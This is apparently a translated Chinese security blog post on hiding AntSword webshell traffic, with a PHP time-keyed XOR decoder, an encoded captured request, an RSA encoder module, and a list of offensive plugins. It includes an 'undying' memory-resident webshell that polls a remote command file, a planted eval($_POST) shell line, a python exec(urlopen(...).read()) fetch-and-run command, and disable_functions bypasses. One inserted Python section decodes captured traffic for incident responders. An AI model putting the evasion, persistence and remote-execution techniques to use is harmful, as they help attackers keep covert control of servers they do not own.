// same key as the encoder: md5 of the current minute
$key=md5(date("Y-m-d H:i",time()));
for($i=0;$i<strlen($post);$i++){
    $post[$i] = $post[$i] ^ $key[$i%32];
}
$lnng1 = &$lnng;
$lnng = $post;
$lnng2 = $lnng1;
@$comi->c = substr($lnng2, 0);
?>
b581dec526a568=EYY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIGYwNDI5OWUmY2QmZWNobyAxODI2MWM4ZGY4OTM%3D&n08d50c7fefb55=4AY21k&u909700452f2fe=xp&x=UhUHDk1aBBEEDwZpUVcBDVJXThUwJFpDUTIMGT49ZV5%2BDjQSBgsnEThhXlBvaigbVAEsTSgKQVF5DnQKLzFAcFRRMFI9CzcSA25kUFd1DhZXajdYLCBdAXojDBQ%2BIlhIZzYkEgdVCQQ7C2QGfnEoFFV1MEI5UXxeU1ZjCAU9fVh8NxISP1ECCQMKcF1UaisSf3oVXANReAVqIAQIBT1%2BRG40Vw4uezcENAlkZWNZNDFhSyxjMFJ8fGUiZwU2Dlh8ZTZTIDFtMAs5alkBf3VbFW9qLE4xO3RPajNRBQdWdkJWOzcNPFUjGDttawZtADAObwBfXDswUV9kLEVTKyANQXgnVgsuaxIJAwpwXVRqKxJ5AiRfAg18XlUyDBQAPXpefCA0FAZ%2FIxsCUEVdVwAsUWxxHk0EO3hQalZjUzxWZl1VOyQEP38JGyp6WUZ6ADgUVV8wXzhRUVl6IwwUPT1%2BSH4kIBgsezcSBX5kQn5hIFVXZT9YKDZ0RlNVDFAHCFgBbjQsET9rAgkAYWBaV2EJElMAKEEDDWRGUgpjDytWBAZ9KzQWP38JGzFqYEZRdTQWelsvQS0JewJ%2BHmxTPiF5BHkZKwsqCCcWAAtgRlZbBQlSdVdcADt%2FRn9WWQ4vJnJwbQ4KET9uXA4Efl5MUXovDXx6NEM7JFpPezdZVD1XDURTJAoXAW8wVQdqYAZXZTASVVhXTjs0cEVTI3NTBSZTWlMkVwkEYCwSLglwXFR1MBJVWwFcBSQHXVE8fBMrVXZBVQ4KBAYKM1IqenhAVnU0F24ALF8CUWBdUTx8CigmdVh7ClILLmwWCTgLBwZsaigbZmckQAIOYFhoV3sUBiJYAXwgLxQ9fh0BOXFKVXlLWgt6cTQHAzRkRlMNXlQ%2BCA1IfCA0EjVsJFUrflkOVgAOVGxlX1oqIGRcUgpnCwcLfUF4GjQSLkEWEgQJcFxUdTASVVsBXi0KAl97MEFaK1V2QVUOCgQGCjNSKnp4QFZ1NBduACxfAlFgXVE8fAooJn1HfgoNVTRwLxY7fl5PfnEwUlRlNEcCCl0BaQp%2FDz0yRwZRNxJbKkIRDwVuB1xRdQ4UVFskXwJRYENpHVIIBlZiAXw7Egk8YDcOOQtgWm9fJFNUejRRBSRaQmo8RRUGCGJXVFEwUi57LzM0Un9ffmYRCVcAMAIxNAddfjddCD09Zl18ICw4KW9VFjt6cH96XwkLeno0RwM0Y1l7N14TK1duR1QKAQkEbFUVLkBgRmV6LFJVXx5bAwpRXVJXY1MvMUdaVjAVEC5gFgkDCmQGYkswEm5hJw4oIGRAVDxnAS4iWFV%2BJVIFL38RDgRvQV1UYTcYe15WAAc7fFpULGMaBgx2cG4OIBg%2FbDxSOQtkQ2wAWwlsYQFcA1BgBnswQVorV24AVQ4oUgRvXBcofnRMVwE0UlV6MAcqIFoBeiMMUgAtdgBTJ1cUPFRcDDthYFBsAFsXUnUwQgUre1l7MEEVPQkNXVUONAQ8Ch0OOG4GWX5mFg5vAA5BKCB8Wn0zZFM9D31YewovFSgKKBgvU39fegA0CFd1XlAwJHBMajMACS8mZkdTOzQVAWA0Ei4LZFxUdVoFf1gFBigKAl99IHxQLQ9ACFVRLAQGCzcKAldjWX5mFlJVXAoAKyt3D2kJcxk%2BMW0Bb1E0DjwKXAk7alpMUWUoGFJ6L1grJQ9nZFV7NjMcfkR6Jw4JK2wnCC8LaFpvXytTeGEsUy0nf0Z7MEYIBx8FWG47KA4rUjcEO35kXFcAMA59eigGOA
14BlMNUgg8VHZhYlI0ACxVLFMufXRdb2UvU3tYPF8vN28CeQgFECkMX0F4GjQOB1Y%2FGAVxew9kdSgKVQAzBS8lD11qM3sVPiJhXlRQMAsGCzcbKnpgUGB3WzZgdBVeBTddQX8wVhQpIWUAeg4%2FGz9VMAs5akVPfmEJVXx1Nw47JFpPUglzFz42U1pvUigkMFQ%2FJDRVQV9gAiwxZWQkYjlTbHxkIWMsNTAFd34PVhIqQTcIMWF8B2xcLFJVWwFcOyBBQXwgcBM0MQRYexovTSxRVAgof0VfUEswGFBkEV4oCVlffFZ4BDwmfgZ9KyhbPXssCy4LXlt%2BeixTb1woBwIKUV1qJ0IUKCFxQWc3VgspQSwSBAlwQVFqMA5UXD9YKA90dGYhUlotDAFfbTs0DgdWPA0oVXB0Y3cFC31hUl4uCg8HU1d8FQYiDVtuNBEUBgovEgNTXUBRaiwbegAeQThRcEV8Vn8TBg9bR1M7KBspCysLAG4GAHkBNBhVW19eADQCAHxXewoFMgAHe1EsEgdRLBIuCgNaV3osDlMCJEAFO2RaUgpsDC0JdnNhJgFbLFFQDDthYFpXXDsNf14kdTcmUV97NwEKK1V5B3tSAhIHVTcUBQp%2FQFYBDhhSdTBDLBl%2FAWEeWhUyV1hEbSRfUQZBXDYEYXxuYQMBUHh2EnMuCg9uUTMACAZWUEt4UytUKQkBEgNUYEBRAS8UYwEKTQUkYEJ9HnwVMldYRG0kX1EGCScUBQtkT2AACg5UdRFBBQlzQ30nDVQtDF8GUTQKDy57Iw4DYXAGUGEFCWxlUwUCUGRPezdZVC4iYkRTDiAbBlJUDgRxcEVXADAOfXEsDwcrTl5TVk0TBghiCVErEQspeyQJO24HBFYBMBt9ZhJaA1B8WmkzewwvJmZdVQ08CgZWLAU4YX9Rf3o7En96Ekc7CndZeTNjFwctZgR8IDRQLmsOBQQJcEFRajAOVFw%2FWAJQZE9oV38PByJMWW5RMw0sVh1aB350TFQANFdQeh4PKApBUXkOBQooJnVaUwoNEioLVFsHamBPZWEoVXx6JA4oK0VdaVcFCitXbgBVDihSBG9cFyh%2BaFp%2BcTAPfWoVXDsnB1pVLHcQBldmXXwgLxEsUR0jAG4HRm0ABg5ScQFeOyRaTGkzfxA%2BMw1cUzRTCAF%2FCRQDV39ffmEJVVdlP1g7NAdBVCxeDC4iZUF8OxUJP3xUCgJXeF5QYQUSeQFXWwMreFpVHWcINDJySFQOIFc9ClQKAnpVWFF6KBJUYQVEODt8T2k8WQUGMnJGfCACGAFwL1IDC0pAUQA0G3xLEVw7IF1Gf1cEGj49ZgBUDlINP1YzFzgKYEZXAFcEbGoORwJQZEx7J2cOLzZtXFY7KAQ8CiMRA350X1d1Nw18dT9HKwpvXlEzAAU9PX5IbjsNDS9%2FPBErfmNGfmYWW3kAPAYDDngGUTMMFi0tfgBVDSgNP28dEQILWkBsABENfHU3RCggZFx7N3dUBTJtVnwrKFM8VitSAlBVXW9xFQV7cRFQLDBdUWAwBQQtDAxYfiA%2FDyx%2FPw4qelZBUWowDlRcP1kqMHdbeg10DD4IYV59UTAbBlVcGzkLSkBvSwESf3oeDygkbFp7J1EXPTJYQn0aDRIuaydVAG5rUX56LFJVXCgHAgpeT2ozcwgGIlhEVhoBCykKLxIDUAtMVHErEnpxJ144DnBMUSd8Ey0mcQh%2BJjwgMX4rJCpqcAF%2FejAWVXEnDigrZFpSPHcWPTIEXlRQChg9CgEOBX8LBm9lUxVuADRHAgpRRnwndA09PXlffDcSFQFgNw4DV2tZfF4gK2N0X3o1U0EPeydeBAEcdgV4GiRbKkEkCThAcx1%2FejAWVXEnTjEKb055DV5UBTJtVnwkPA4uewEOAld4QFZeWxFUAAVZKjBdUVVWYxoHCA1Ib1EeFD9BAgs4antFfHYnEnkBVlA7NE5M
ajd3VAYyckFVIAELPG0kGixTUUN4cVYVelgjXi0gd195DUIELQx9Qn4gLxY8VjwLKm1GD1NhIA5UeihbKCtCT2o8Z1IHCABWZQ4gEQYKMFUHamBAUWowFVJqN1AxMHR3aglZED4zDV9tOzQEPApcFwV%2BZENRei8NfHo0QwIgXQFhLGMWBiJYRFYaAQkBf1QVKm1GRm9bIw18dV8GBSt0B1QndAs0NnVYfgoNBQALJxsAbgcGfnEwFFJqNEAFO2dGf1d%2FDwAtYkhVCiQ3BlYzDi4KAw9WXzRSUmosQigmbF5SLHsPK1YEBm0NMBc8CzcSAwsGUVZcNBdvAFdcKiBkXHs8RggHCGIBZzcnVS9%2FNFs7fl5PV18kFmxhAVw5UnhwZQhvJTEJR1hiUygxNm4nNzkJaHxhdzQtZ2dXcSgPBkZ%2FVlkOLyJuXXwgAhgAYCtSO24CWH5hDlVneigCAlBkWlI3Ugg9HENaVA4wUi5sEVs7bkpMb2UOD311PFsqIFJBaTx7GQAiXEhTMAUSLmARIwJ%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%2BSG47DQ0vCycSAn5nWHlxIwxSSwVHKjBBUXojWRUvMUACViQKET9rAgowfmhaVwA7DXx1CkE2GXBSezdZVActfkFVDTcNNH8%2FDDthYEx%2BcTASVAMVTzkwQU99IGRXLzZfBlE7Ag0Ebx0OKnp0d29fNBRsWwFcADQPVH0IBRMvPUBGVA4KFwF7DSM7VFZaUXovDXx1CkE2GXxSfCB8FCohU0F8NxJbNH8%2FCAN%2BC0xvYQUJV2VfVSw1BkZ%2FVHcOPVdMR1RRMw0vfwkUNkN4Un5mFiNVeixBOFIPXFIjDBk%2BNlNaVCANVQNvMxECC2RGb1sKD2xhAVk4NAMGU1dZGQAiYkV9Gg0SAAgnCgNXYExQaixSbGVWWCske0Z%2FVwQPBi16XVY0Pw0GVjMXAgtaWld1GhhXdV9dABpRXWonQgQuInlBfDAkVQZVM1IFYXhDfHEwG2xqNwAHNGBFU1ZjEz4MXEtTNCwYAXAsDSt%2BY0V4cRUafWEjDigKDl95J2wOLSB2W1UkIBgGCVwOBH5eTFF6Lw1%2FWShnNTB%2FRns8RggAHwVEbTsFBTQIXCwqelZuYAAsG1dqJActDXhZajNNEC4cXwZ9JDNbL3AGFjFUZAJvZS8NfHUrRy4aZExSHgUIPjYEGmJQNAkxCzNSKnpZAX96KA5ScVIOKyt4QHwwADA%2BMnJaZjQeES57DlUrcXxaZWEwDnpmU2MFJGRwUwp8DC8xR1pUDjBSKVJVCQILZ0JlXigOb2U0dQMkQVl7MEEUBwhYRFMgAQkGVTNSKm1GD29lGhhsahVcAg5gBnkgBQQpMX0CeFBXGz9gN1MCVAZRf3ooDlJ2Eg4uGmRPajxkWjUtfgBVDigWP3sCCQJQBl98ditJfFgjXio3QkFTCVkWACZ1Xn0rLA4BeyBbLHpZGXxcKA5SdlcAKyt8WlQsBQorDH1YeBkSWzwKI1I4C1VZZ2oKCGxqJAcANA9DeSdnDy89QF1uUQ4ULHsvJDRVeGZgWA0UeksvQiskY0JgCVEPACAFXVRQKAo%2FCjANKm1GD3oAJBhUATAHAitgBnsnXlQ%2BIlhdfCANVUcRTFk%3D
At this point no sensitive traffic can be detected any more.
A further benefit of the time-based obfuscation is that anyone who later tries to replay the traffic to learn what the code did cannot do so, because the corresponding time no longer matches; the concrete operation of that code therefore cannot be recovered.
RSA encoder
Only AntSword versions above 2.1 support the RSA algorithm for PHP.
The RSA approach uses asymmetric encryption: the content to transmit is first encrypted with the private key, sent to the shell, and the shell decrypts it with the public key, which obfuscates the traffic. The principle of RSA is not covered here, but the RSA encoder has a prerequisite: the openssl module must be enabled.
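For an incident responder the question is the reverse one: given a request body from a packet capture or access log, what did it run? The following Python is an added example, not part of the original post or of yzddmr6's encoder. It reimplements the shell's key derivation from the code above (md5 of the minute, formatted Y-m-d H:i in the PRC zone the shell sets) and tries the minutes around the timestamp recorded for the request. Because the key depends only on the wall-clock minute, the replay protection described above stops the shell from re-executing stale traffic but does not stop an analyst who holds the request timestamp from decoding it. The sample payload and timestamps are constructed; the encoder-side helper assumes the operator's clock agrees with the server's.

```python
import base64
import hashlib
from datetime import datetime, timedelta, timezone

# The shell calls date_default_timezone_set("PRC"): UTC+8, no daylight saving.
PRC = timezone(timedelta(hours=8))
PREFIX, SUFFIX = b'eval(base64_decode("', b'"));'


def minute_key(when):
    """Key the shell derives: md5 of the request minute as Y-m-d H:i, kept as 32 hex bytes."""
    stamp = when.astimezone(PRC).strftime("%Y-%m-%d %H:%M")
    return hashlib.md5(stamp.encode()).hexdigest().encode()


def xor_with_key(data, key):
    """Byte-wise XOR against the 32-byte key, cycling like $key[$i % 32] in the shell."""
    return bytes(b ^ key[i % 32] for i, b in enumerate(data))


def encode_like_antsword(php, when):
    """Client side, reimplemented only for the round trip (constructed helper, not the
    real encoder): base64 the PHP, wrap it in the eval(base64_decode("...")) loader,
    XOR with the minute key, base64 the result."""
    inner = base64.b64encode(php.encode()).decode()
    stage = PREFIX + inner.encode() + SUFFIX
    return base64.b64encode(xor_with_key(stage, minute_key(when))).decode()


def recover(param_value, log_time, window_minutes=2):
    """Decode one captured parameter value using the access-log timestamp.

    Clock skew between client and server, or a request that straddled a minute
    boundary, shifts the key by a minute, so every minute within +/- window is
    tried and the candidate that yields a well-formed loader wins.
    Returns (minute_used, plaintext_php) or None.
    """
    blob = base64.b64decode(param_value)
    for delta in range(-window_minutes, window_minutes + 1):
        candidate = log_time + timedelta(minutes=delta)
        stage = xor_with_key(blob, minute_key(candidate))
        if stage.startswith(PREFIX) and stage.endswith(SUFFIX):
            inner = stage[len(PREFIX):-len(SUFFIX)]
            try:
                return candidate, base64.b64decode(inner, validate=True).decode()
            except ValueError:
                continue
    return None


def demo():
    """Constructed scenario: payload encoded at 10:30:59 UTC, request logged at 10:31:10 UTC."""
    sent = datetime(2024, 1, 15, 10, 30, 59, tzinfo=timezone.utc)
    logged = sent + timedelta(seconds=11)
    value = encode_like_antsword('echo "constructed";', sent)
    found = recover(value, logged)                            # one minute back matches
    stale = recover(value, logged + timedelta(minutes=30))    # outside the search window
    return found, stale


if __name__ == "__main__":
    found, stale = demo()
    print("recovered:", found)
    print("30 minutes later:", stale)
```

The window matters in practice: the logged time is when the server finished the request, while the key was derived from the client's clock when the payload was built, so the minute that decodes is often one behind the log entry.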
/**
 * php::RSA encoder
 * Create at: 2021/03/02 15:27:33
 */
'use strict';
/*
 * @param {String} pwd   connection password
 * @param {Array}  data  payload array before the encoder runs
 * @return {Array} data  payload array after the encoder runs
 */
module.exports = (pwd, data, ext={}) => {
  // prepend a freshness check: the shell dies if more than 5 seconds have passed since encoding
  data["_"] = `if((time()-${parseInt((new Date().getTime())/1000)})>5){die();};${data['_']}`;
  // split into chunks of at most 80 characters and encrypt each with the private key
  let n = Math.ceil(data['_'].length / 80);
  let l = Math.ceil(data['_'].length / n);
  let r = [];
  for (var i = 0; n > i; i++) {
    r.push(ext['rsa'].encryptPrivate(data['_'].substr(i * l, l), 'base64'));
  }
  data[pwd] = r.join("|");
  delete data['_'];
  return data;
}
data["_"] = `if((time()-${parseInt((new Date().getTime())/1000)})>5){die();};${data['_']}`;
This line is added to the encoder to give the data a validity period: after 5 seconds the data expires and the shell simply dies.
AntSword plugin overview
Copy a plugin's directory into antSword/antData/plugins/ and it is installed.
- as_bypass_php_disable_functions: bypasses disable_functions to execute system commands and gets around open_basedir and similar protections
- AS_BugScan: BugScan node creation plugin; creates a BugScan node through the WebShell
Usage: in a terminal run
python -V
If it prints a version you can continue; if python is not found, add python to the environment variables first. Open BugScan and go to the scanner. Click "add task" and, under the "nodes" sub-tab, get your personal node-creation link. If the page shows:
python -c "exec(__import__('urllib2').urlopen('http://t.cn/Rqu1SmB?xxxxxxx').read())" -m 5
then the URL field of this plugin should hold the URL from the urlopen call: http://t.cn/Rqu1SmB?xxxxxxx
The "max tasks" box controls the maximum number of targets one node accepts; the default is 5.
Click start to try creating the BugScan node. Once created, the node appears on BugScan's add-task page.
Note: check in the virtual terminal whether Python 2.7 is in the environment variables.
- as_jwtdebugger: AntSword JWT debugging plugin
- as_messycoderecover: tries to recover mojibake; not every garbled string can be recovered perfectly, and a question mark in the garbled text means that character is already lost and cannot be restored
- as_netstat: AntSword plugin for viewing network connection state
- as_plugin_godofhacker: the hacker's magic tool, try it and you'll see!
- as_plugin_import_shell_from_csv: bulk-imports shells from a CSV file
- AS_Redis: AntSword Redis management plugin, requires AntSword >= 2.0.3
- as_scanwebshell: finds backdoor webshells by regular-expression matching
- as_webshell_venom: the AntSword edition of webshell-venom
- check_rwx-suid:
1. Finds readable, writable and executable directories on the target server as well as files usable for SUID privilege escalation (supports asp and aspx on Windows and php on Linux).
2. For asp and aspx shells this is done by uploading a standalone detect.asp(x) file (clicking the "user" button opens a confirmation dialog; after confirming, the file is generated on the server). Once generated, open detect.asp(x) in the webshell's directory, enter the range to check and run it.
- GenShell: AntSword shell generator plugin; generates a shell from a user-supplied or randomly generated password
- inject_und3ad: plants an "undying" PHP webshell on the target server
Click the remote-file button in the top-left corner, enter the remote control file address and the polling interval in seconds, separated by ###, and click OK.
For example: http://192.168.134.128/1.txt###60 polls the content of http://192.168.134.128/1.txt every 60 seconds.
The file content looks like:
file_put_contents('./1.php','<?php @eval($_POST[xxy]); ?>');
(The password and the path can be customised; this file content writes a small shell every polling interval.) The above uses PHP behaviour to plant the undying webshell: after it has run, the webshell sends a request to the user-configured remote file address at the user-configured polling interval, and the user only has to put the commands to execute into the txt file at that remote address.
After running, this webshell deletes itself and stays resident in memory, leaving no file behind.
Ways to remove it include restarting the web service.
After the undying webshell has been planted, the remote control file address is recorded and is shown under "历史远端控制文件" (history of remote control files) the next time this panel is opened.
- LiveScan: AntSword webshell liveness check plugin
1. Requests each webshell and decides whether it is alive by checking that the returned data matches
2. Only works for PHP, ASP and ASPX
3. One click moves unreachable webshells into the [.Trash] category
4. One click empties the [.Trash] category
- PortScan: AntSword port scanning plugin; scans specified ports on internal-network hosts through the WebShell
- SuperTerm: AntSword interactive terminal plugin; opens an interactive terminal through the WebShell
- ExecScript: AntSword custom script execution; runs custom php, asp or aspx scripts on the target host
Plugins:
Link: https://pan.baidu.com/s/1w3fW4721OALvClGoULSc3g
Extraction code: 0117
Originally published by the WeChat official account 深度网络安全实验室 (Deep Network Security Lab): AntSword traffic obfuscation and plugin collection [armed and ready!]